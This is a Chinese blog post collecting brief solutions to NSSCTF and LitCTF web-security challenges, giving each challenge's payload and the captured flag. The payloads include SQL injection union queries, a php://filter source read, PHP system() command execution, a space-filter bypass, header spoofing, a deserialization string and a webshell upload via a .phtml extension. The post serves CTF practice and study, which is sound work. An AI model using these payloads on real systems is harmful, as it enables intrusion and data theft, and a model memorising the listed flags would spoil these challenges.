跳到主要内容
NSSCTF Web 竞赛题目解题汇总 | 极客日志
PHP 大前端 算法
NSSCTF Web 竞赛题目解题汇总 NSSCTF 及 LitCTF 竞赛中的多道 Web 安全题目解法,涉及 F12 源码分析、SQL 注入、文件包含、命令执行、反序列化、文件上传等漏洞原理与利用技巧,附带具体 Payload 及 Flag 结果。
禅心 发布于 2026/4/6 更新于 2026/5/23 39 浏览[SWPUCTF 2021 新生赛] gift_F12
点击确定
查看源码
NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}
[SWPUCTF 2021 新生赛] jicao
GET: json={"x":"wllm"} POST: id=wllmNB
NSSCTF{47e0e900-250c-40d2-8ccf-2fef864d242a}
[SWPUCTF 2021 新生赛] easy_md5
MD5 弱比较绕过:314282422、571579406
NSSCTF{9668d690-7b6d-42a0-8c20-205dd6b5dc7f}
[SWPUCTF 2021 新生赛] include
伪协议读源码:php://filter/read=convert.base64-encode/resource=flag.php
<?php
$flag ='NSSCTF{d44702c1-094b-489a-a0ab-50471944f73d}' ;
[SWPUCTF 2021 新生赛] easy_sql 字符型单引号。判断列数:/?wllm=-1' order by 4--+
查看回显位:/?wllm=-1' union select 1,2,3--+
查库:/?wllm=-1' union select 1,2,database()--+
查表:/?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="test_db"--+
查 test_tb 表的所有字段:/?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="test_db" and table_name="test_tb"--+
查看 flag 字段的内容:/?wllm=-1' union select 1,2,flag from test_tb--+
NSSCTF{e2e3e44f-3751-4545-b48f-4c41818fa887}
[LitCTF 2023] 我 Flag 呢? NSSCTF{cd21a6ec-88cb-46cd-b40f-1d0baa9b785f}
[SWPUCTF 2021 新生赛] easyrce /?url=echo(system("ls /"));
/?url=echo(system("cat /flllllaaaaaaggggggg"));
NSSCTF{80867aa5-b8f8-4ebb-bbe8-d38fb3b5206f}
[SWPUCTF 2021 新生赛] caidao wllm=system("cat /flag");
NSSCTF{c30de7d3-4048-4037-8bf6-265e61bdc95a}
[SWPUCTF 2021 新生赛] Do_you_know_http 要求本地,X-Forwarded-For: 127.0.0.1
NSSCTF{6207b742-51ff-42e3-a012-aede36925162}
[SWPUCTF 2021 新生赛] babyrce 只过滤了空格,用 $IFS$1 绕过:/rasalghul.php?url=cat$IFS$1/flllllaaaaaaggggggg
NSSCTF{571f2fa9-f820-4245-9f42-c08d6061d016}
[第五空间 2021] WebFTP NSSCTF{d7c12238-0701-467f-9ca8-d0a4971e903f}
[SWPUCTF 2021 新生赛] ez_unserialize <?php class wllm { public $admin ="admin" ; public $passwd ="ctf" ; } echo serialize (new wllm ());
Payload:/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
NSSCTF{01336073-5e78-4911-a3ee-f7dcbf4846d3}
[SWPUCTF 2021 新生赛] easyupload2.0 只过滤了 php 后缀,用 phtml 代替即可。上传小马后,进行命令执行:cmd=system("env");
NSSCTF{cff7743d-5e0e-47f5-a56f-f28896e96f7b}
[LitCTF 2023] 导弹迷踪 在 game.js 中发现 flag:NSSCTF{y0u_w1n_th1s_!!!}
[LitCTF 2023] PHP 是世界上最好的语言!! <?php system ("cat /flag" );?>
NSSCTF{cb2166a8-18d3-4c03-83eb-1fbe47d1b2b7}
相关免费在线工具 加密/解密文本 使用加密算法(如AES、TripleDES、Rabbit或RC4)加密和解密文本明文。 在线工具,加密/解密文本在线工具,online
Gemini 图片去水印 基于开源反向 Alpha 混合算法去除 Gemini/Nano Banana 图片水印,支持批量处理与下载。 在线工具,Gemini 图片去水印在线工具,online
curl 转代码 解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
Base64 字符串编码/解码 将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
Base64 文件转换器 将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
Markdown转HTML 将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online